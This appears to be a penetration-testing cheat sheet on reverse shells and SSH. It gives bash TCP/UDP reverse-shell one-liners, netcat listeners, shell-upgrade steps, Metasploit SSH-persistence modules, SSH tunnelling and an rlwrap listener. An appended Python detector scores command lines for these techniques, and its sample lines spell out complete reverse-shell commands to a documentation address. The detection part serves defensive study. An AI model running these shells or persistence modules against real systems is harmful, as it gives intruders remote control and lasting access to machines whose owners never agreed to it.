Reverse Shells and SSH


Bash TCP quick reference:
bash -i >& /dev/tcp/ 0>&1
0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/ 0<&1 2>&1
Bash UDP quick reference:
sh -i >& /dev/udp/ 0>&1

Attack Box

Netcat TCP listener on 4444 (-l listen, -v verbose, -n numeric IPs only, no DNS, -p local port)
sudo nc -lvnp 4444
Netcat UDP listener
nc -u -lvp 4444
Terminal Upgrade (choose one)
python3 -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null

Further terminal upgrading (clear, autocomplete, arrow key usage)

In the target machine's shell, enter:
export TERM=xterm
then press CTRL + Z to background the reverse shell on your host, followed by (on your host):
stty raw -echo; fg
stty raw -echo puts your local terminal into raw mode: keystrokes are passed straight through to the remote shell as they are typed rather than being buffered until you press return, and local echo is turned off so the remote side handles it. fg then brings the backgrounded reverse shell back to the foreground, now with working clear, tab completion and arrow keys.
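The other side of the quick references above: the one-liners and the terminal-upgrade steps leave recognisable strings in process command lines and shell history. The following is an added detection example, not part of the original cheat sheet; the sample command lines are constructed, the indicator names and weights are assumptions to tune per environment, and the session score exists because the upgrade steps are a sequence that is stronger together than any one of them alone.

```python
import re
from typing import Dict, List, Tuple

# Indicators drawn from the commands on this page. Weight (assumed) reflects how
# rarely the pattern appears in legitimate admin activity: stty raw -echo and
# script(1) are sometimes used on purpose, /dev/tcp redirection almost never is.
INDICATORS: List[Tuple[str, int, "re.Pattern[str]"]] = [
    ("dev_tcp_udp_redirect", 5, re.compile(r"/dev/(?:tcp|udp)/")),
    ("pty_spawn", 4, re.compile(r"pty\.spawn\(")),
    ("script_pty_upgrade", 2, re.compile(r"\bscript\s+-qc\s+\S+\s+/dev/null")),
    ("stty_raw_noecho", 1, re.compile(r"\bstty\s+raw\s+-echo\b")),
]

# Constructed sample command lines, as one might collect from process auditing
# or a user's shell history. Addresses are RFC 5737 documentation ranges.
SAMPLE_CMDLINES = [
    "ls -la /var/log",
    "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
    "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "/usr/bin/script -qc /bin/bash /dev/null",
    "stty raw -echo; fg",
    "export TERM=xterm",
    "sh -i >& /dev/udp/198.51.100.7/4444 0>&1",
]


def classify(cmdline: str) -> Dict[str, int]:
    """Return {indicator_name: weight} for every indicator matching cmdline."""
    return {name: weight for name, weight, pat in INDICATORS if pat.search(cmdline)}


def score(cmdline: str) -> int:
    """Sum of weights for a single command line."""
    return sum(classify(cmdline).values())


def scan(lines: List[str], threshold: int = 2) -> List[Tuple[int, int, str]]:
    """Per-line alerts: (line_no, score, cmdline) for lines at or above threshold."""
    return [(i, score(l), l) for i, l in enumerate(lines, 1) if score(l) >= threshold]


def session_score(lines: List[str]) -> int:
    """Session-level score: each distinct indicator counted once across all lines,
    so a low-weight step like stty raw -echo still contributes when it follows
    a reverse shell and a pty upgrade in the same session."""
    seen: Dict[str, int] = {}
    for line in lines:
        seen.update(classify(line))
    return sum(seen.values())


if __name__ == "__main__":
    for line_no, s, cmd in scan(SAMPLE_CMDLINES):
        print(f"line {line_no} score {s}: {cmd}")
    print("session score:", session_score(SAMPLE_CMDLINES))
```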

SSH persistence

Metasploit has the following two post modules:
Linux: post/linux/manage/sshkey_persistence
Windows: post/windows/manage/install_ssh

SSH Tunneling

If you are able to SSH into a device but cannot reach another port on it directly (for example, port 5555 on Android devices), you can port forward so that the traffic travels inside the SSH tunnel.
The following example binds a local listener (-L) on port 5555; connections to it are carried through the SSH session and delivered to port 5555 on the remote machine.
ssh -L 5555: -p ssh_port [email protected]
Then, when you execute the following command in another terminal, its traffic is forwarded over SSH to the remote device.
adb connect
SSH tunneling also works for web browsing: just change the forwarded ports and point your browser's proxy settings at the local end of the tunnel.

Interactive Windows Shell

Interactive shell from Unix to Windows using rlwrap, which wraps the netcat listener with readline so that line editing and command history work for the incoming Windows shell. Execute the following command on the Unix box.
sudo rlwrap nc -lvnp [port]